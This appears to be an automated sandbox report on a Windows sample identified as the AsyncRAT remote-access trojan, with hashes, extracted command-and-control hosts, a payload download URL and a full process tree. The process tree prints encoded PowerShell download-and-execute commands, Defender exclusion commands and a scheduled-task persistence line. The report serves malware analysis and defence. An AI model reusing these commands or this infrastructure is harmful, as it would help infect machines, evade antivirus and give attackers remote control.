Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
30/03/2025, 12:12
Static task
static1
Behavioral task
behavioral1
Sample
reversheshellb64batTO.exe
Resource
win7-20240903-en
General
-
Target
reversheshellb64batTO.exe
-
Size
88KB
-
MD5
aa8d4f9a7cea9c7c8de61478ae5a7f81
-
SHA1
5b8ce5f94b702731877e55822dfb505af4332fa6
-
SHA256
cb89e6fafecf411a75df6cb06b2302e8f3c9696232dbdff6b25b3d6bec635c91
-
SHA512
2f54a16ad0a7a0ec8c6ea4f08cd28c587a6ac29421ec1433150e80e164d48bdd312480a86b15477deee4e11f3cf331823400a9fc858451fc4eaf59213577c982
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf3xP+:fq6+ouCpk2mpcWJ0r+QNTBf3B+
Malware Config
Extracted
https://tinyurl.com/VIRGPLOAD
Extracted
asyncrat
0.5.8
Default
holefo2785-22820.portmap.host:22820
holefo2785-22820.portmap.host:6606
Oma7kBAtvlxY
-
delay
3
-
install
true
-
install_file
discord.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000e00000002407c-90.dat family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 19 3184 powershell.exe 24 3184 powershell.exe -
pid Process 6108 powershell.exe 4616 powershell.exe 5364 powershell.exe 3144 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 24 3184 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation reversheshellb64batTO.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation reversheshellb64batTO.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe -
Executes dropped EXE 2 IoCs
pid Process 1652 RuntimeBroker.exe 3932 discord.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reversheshellb64batTO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reversheshellb64batTO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language discord.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6120 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2536 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 6108 powershell.exe 6108 powershell.exe 3144 powershell.exe 3144 powershell.exe 4616 powershell.exe 4616 powershell.exe 2668 powershell.exe 2668 powershell.exe 5364 powershell.exe 5364 powershell.exe 5696 powershell.exe 5696 powershell.exe 3184 powershell.exe 3184 powershell.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe 1652 RuntimeBroker.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 6108 powershell.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 5364 powershell.exe Token: SeDebugPrivilege 5696 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 1652 RuntimeBroker.exe Token: SeDebugPrivilege 3932 discord.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2076 wrote to memory of 3960 2076 reversheshellb64batTO.exe 88 PID 2076 wrote to memory of 3960 2076 reversheshellb64batTO.exe 88 PID 3960 wrote to memory of 6108 3960 cmd.exe 91 PID 3960 wrote to memory of 6108 3960 cmd.exe 91 PID 3960 wrote to memory of 3144 3960 cmd.exe 93 PID 3960 wrote to memory of 3144 3960 cmd.exe 93 PID 3144 wrote to memory of 3040 3144 powershell.exe 96 PID 3144 wrote to memory of 3040 3144 powershell.exe 96 PID 3144 wrote to memory of 3040 3144 powershell.exe 96 PID 3040 wrote to memory of 5852 3040 reversheshellb64batTO.exe 97 PID 3040 wrote to memory of 5852 3040 reversheshellb64batTO.exe 97 PID 5852 wrote to memory of 4616 5852 cmd.exe 99 PID 5852 wrote to memory of 4616 5852 cmd.exe 99 PID 5852 wrote to memory of 2668 5852 cmd.exe 100 PID 5852 wrote to memory of 2668 5852 cmd.exe 100 PID 2668 wrote to memory of 5364 2668 powershell.exe 101 PID 2668 wrote to memory of 5364 2668 powershell.exe 101 PID 5852 wrote to memory of 5696 5852 cmd.exe 102 PID 5852 wrote to memory of 5696 5852 cmd.exe 102 PID 5696 wrote to memory of 436 5696 powershell.exe 103 PID 5696 wrote to memory of 436 5696 powershell.exe 103 PID 5852 wrote to memory of 3184 5852 cmd.exe 104 PID 5852 wrote to memory of 3184 5852 cmd.exe 104 PID 3184 wrote to memory of 1652 3184 powershell.exe 107 PID 3184 wrote to memory of 1652 3184 powershell.exe 107 PID 3184 wrote to memory of 1652 3184 powershell.exe 107 PID 1652 wrote to memory of 3900 1652 RuntimeBroker.exe 111 PID 1652 wrote to memory of 3900 1652 RuntimeBroker.exe 111 PID 1652 wrote to memory of 3900 1652 RuntimeBroker.exe 111 PID 1652 wrote to memory of 1552 1652 RuntimeBroker.exe 112 PID 1652 wrote to memory of 1552 1652 RuntimeBroker.exe 112 PID 1652 wrote to memory of 1552 1652 RuntimeBroker.exe 112 PID 1552 wrote to memory of 6120 1552 cmd.exe 115 PID 1552 wrote to memory of 6120 1552 cmd.exe 115 PID 1552 wrote to memory of 6120 1552 cmd.exe 115 PID 3900 wrote to memory of 2536 3900 cmd.exe 116 PID 3900 wrote to memory of 2536 3900 cmd.exe 116 PID 3900 wrote to memory of 2536 3900 cmd.exe 116 PID 1552 wrote to memory of 3932 1552 cmd.exe 119 PID 1552 wrote to memory of 3932 1552 cmd.exe 119 PID 1552 wrote to memory of 3932 1552 cmd.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C39.tmp\5C3A.tmp\5C3B.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe' -ArgumentList 'am_admin'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe" am_admin4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe am_admin"5⤵
- Suspicious use of WriteProcessMemory
PID:5852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5364
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5696 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\7⤵PID:436
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AHUAcgBsAC4AYwBvAG0ALwBWAEkAUgBHAFAATABPAEEARAAiAA0ACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AdQB0AHAAdQB0AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==6⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "discord" /tr '"C:\Users\Admin\AppData\Roaming\discord.exe"' & exit8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "discord" /tr '"C:\Users\Admin\AppData\Roaming\discord.exe"'9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7EF4.tmp.bat""8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6120
-
-
C:\Users\Admin\AppData\Roaming\discord.exe"C:\Users\Admin\AppData\Roaming\discord.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD59a03ce3d82425c856b001b4f8d18c5b1
SHA1782d7f256bf8799c7ec1bd7fabfb9bed2ac5b65a
SHA2562aed929b84cc293687adcff261f734d3309f5d4040b7b9e9793da579c30e18bd
SHA51227537befcc20e8f99a7e67da04c48f9ce31d0fdfb971c509af84141a6d0fbb8c1228edc3785aa9ca73b0d573adc5ac94e26afe636745a41b10bedf98c419e94b
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD567ce8577d16577bede59e604f52ec2de
SHA1c0a7b9d0f0082d227a2e9ae125c09afa08b30ec6
SHA2561cf31abdbb120a1449dd41cbdcf6a183f136dfb525c255c9a5793df5c5a84ba6
SHA512a2491767e88064922bfc42740ec983b04097339cac9fdb93e11cc1fd6344ad52a4bb1cadb3a0a7e11578d84b4ce4da85b04388ba72c620b425a824d70e2fcd3e
-
Filesize
48KB
MD5f814cb9c71d35f8bd503b6d9949aca22
SHA196cb19b70bbcab9627cc3c37a384287a1162dc7c
SHA256d5965c899e5413e91ab7b75669b35d6797b5462c64f99f217a4014e8e4deafbd
SHA512072b7a7cc5be22435d9c498f85479ac51891dbcb2fac8305236f156bada662398e35d53507cc5c4c5094f7bb7c979a47136249f9e7094dd652a1f9e5fb1c3a5f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151B
MD5cff45ab7bab920e1f582726474bb15cc
SHA1632c224e50ee02bc28855ef1a31becbaf87d24ec
SHA25667a511e012265fd0b3750ea9d3adc861bfd2295eb187ce65d74a056fd81d7b21
SHA512b8303dc16d7588149b9fd0018ae7ce6e1c4ade3101b3099a01320c999d787caae1d48d85c910b615c0c743a9d0dbb6c9089146b36e00418c8b088bdd00700fa3